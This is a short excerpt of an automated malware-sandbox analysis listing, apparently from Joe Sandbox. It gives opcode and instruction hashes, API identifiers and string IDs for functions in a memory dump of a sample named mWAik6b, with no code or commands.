                          • Instruction ID: da4ac2ee05969a7c27b64df1879a2b222b7ad13fc2dff2d70f21af7b1f02120a
                          • Opcode Fuzzy Hash: a07908245abafecf1328235fb540c2fb0e45efe1de0d8a40c1569c09169474d6
                          • Instruction Fuzzy Hash: CF900225D4C1008681008F049440470E278930B111F243550900CF3011C750DC42455C
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID: InitVariant
                          • String ID: $$F$J$J$P$T$Y$\$^$_$e
                          • API String ID: 1927566239-2265742063
                          • Opcode ID: dee2d394afdb024f6af2cff23f1d2af5a74deb9203b46f1f3d344699b2cfc2e5
                          • Instruction ID: 5c703e15b1e879e274141d265bef698b2514bc1598f33eef4bd7dbb519a1d5d7
                          • Opcode Fuzzy Hash: dee2d394afdb024f6af2cff23f1d2af5a74deb9203b46f1f3d344699b2cfc2e5
                          • Instruction Fuzzy Hash: 1F412961108B818ED715CF388894716BFA16F67324F09C6CDD9A94F3EBC775940ACBA2
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID: InitVariant
                          • String ID: F$J$J$P$T$Y$\$^$_$e
                          • API String ID: 1927566239-3441486906
                          • Opcode ID: 16a0d25439ac5fdb8eb52718720777bea0252af37b24ceb6037ce3a491959a8d
                          • Instruction ID: 18ab3b5898e430b6a732da35bea9aad92cffba2007e16ebce8a9af90964d5ebf
                          • Opcode Fuzzy Hash: 16a0d25439ac5fdb8eb52718720777bea0252af37b24ceb6037ce3a491959a8d
                          • Instruction Fuzzy Hash: A2411C61109B818ED715CF38C894756BF916F56324F08C69CC9E90F3EAC6759506CB62
                          APIs
                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 0042986C
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID: EnvironmentExpandStrings
                          • String ID: D`a&$D`a&
                          • API String ID: 237503144-2409829873
                          • Opcode ID: 761206987ac2b96abb939d1f998bcfd00da83192f5cde56c81a284e7b20112f7
                          • Instruction ID: 2464d190bea37a10a9128d7142308aec4152c28308ba6278dae345e9c0eb9975
                          • Opcode Fuzzy Hash: 761206987ac2b96abb939d1f998bcfd00da83192f5cde56c81a284e7b20112f7
                          • Instruction Fuzzy Hash: 3921233025C3559FD324CF689C40B6FB7E5EFC2304F05892CE5969B2C0D6748606CBAA